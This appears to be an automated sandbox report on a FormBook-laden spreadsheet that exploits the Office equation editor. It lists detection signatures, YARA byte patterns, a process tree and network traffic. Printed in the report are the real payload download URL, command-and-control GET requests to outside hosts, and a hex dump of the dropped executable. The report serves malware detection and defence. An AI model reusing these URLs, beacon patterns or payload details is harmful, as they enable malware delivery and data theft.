Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Tyre Pricelist.xlsx

Overview

General Information

Sample Name:Tyre Pricelist.xlsx
Analysis ID:321115
MD5:3b5f7a2a0429e796040aa5bc3763a8fe
SHA1:c049ac5a44d034995a55bd5f49aece9631c69c1f
SHA256:9853da661450f9b9a4c06dc952bc70d7cdd8e80cf7e9f8189f2d15682bd88434
Tags:FormbookVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2300 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2332 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2816 cmdline: 'C:\Users\Public\vbc.exe' MD5: 429BBA6DBE159C300679509BE3085665)
      • RegAsm.exe (PID: 2884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
      • RegAsm.exe (PID: 2464 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NETSTAT.EXE (PID: 2832 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 32297BB17E6EC700D0FC869F9ACAF561)
            • cmd.exe (PID: 2220 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cmd.exe (PID: 2468 cmdline: 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • choice.exe (PID: 2368 cmdline: choice /C Y /N /D Y /T 3 MD5: 11DDFBF834BB2C6F4D23297D80EE9E45)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0xa3a98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa3d02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xaf825:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xaf311:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xaf927:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xafa9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa471a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xae58c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa5413:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xb54c7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xb64ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.vbc.exe.510000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.vbc.exe.510000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.vbc.exe.510000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vbc.exe.510000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.vbc.exe.510000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.125.191.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2332, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2332, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeAvira: detection malicious, Label: TR/AD.Swotter.sxyuz
          Source: C:\Users\Public\vbc.exeAvira: detection malicious, Label: TR/AD.Swotter.sxyuz
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeReversingLabs: Detection: 33%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 33%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Tyre Pricelist.xlsxVirustotal: Detection: 27%Perma Link
          Source: Tyre Pricelist.xlsxReversingLabs: Detection: 20%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJoe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: 4.2.vbc.exe.510000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.RegAsm.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then pop esi
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi
          Source: global trafficDNS query: name: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 10:23:44 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Thu, 19 Nov 2020 21:43:46 GMTETag: "92600-5b47c9f64afa6"Accept-Ranges: bytesContent-Length: 599552Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 03 e7 b6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 1e 09 00 00 06 00 00 00 00 00 00 de 3d 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 55 96 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 3d 09 00 4f 00 00 00 00 40 09 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 1d 09 00 00 20 00 00 00 1e 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 40 09 00 00 04 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 09 00 00 02 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3d 09 00 00 00 00 00 48 00 00 00 02 00 05 00 88 9d 08 00 04 a0 00 00 03 00 00 00 10 00 00 06 f0 71 00 00 98 2b 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 3f 00 00 70 80 04 00 00 0
          Source: global trafficHTTP traffic detected: GET /kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut HTTP/1.1Host: www.pestigenix.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kgw/?UL0tlN9h=3e4oHR0srMrz4pb/7ChAIv3inAbNRhZBDtLZ1SN+NiEwBpgcLnXYR/VVRXtAcpgPjhXSMA==&_L30=xTm4lrNPut HTTP/1.1Host: www.atlanticdentallab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
          Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
          Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: workfinethdysanotherrainbowlomoyentthghf.ydns.euConnection: Keep-Alive
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to behavior
          Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: workfinethdysanotherrainbowlomoyentthghf.ydns.euConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut HTTP/1.1Host: www.pestigenix.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kgw/?UL0tlN9h=3e4oHR0srMrz4pb/7ChAIv3inAbNRhZBDtLZ1SN+NiEwBpgcLnXYR/VVRXtAcpgPjhXSMA==&_L30=xTm4lrNPut HTTP/1.1Host: www.atlanticdentallab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: unknownDNS traffic detected: queries for: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
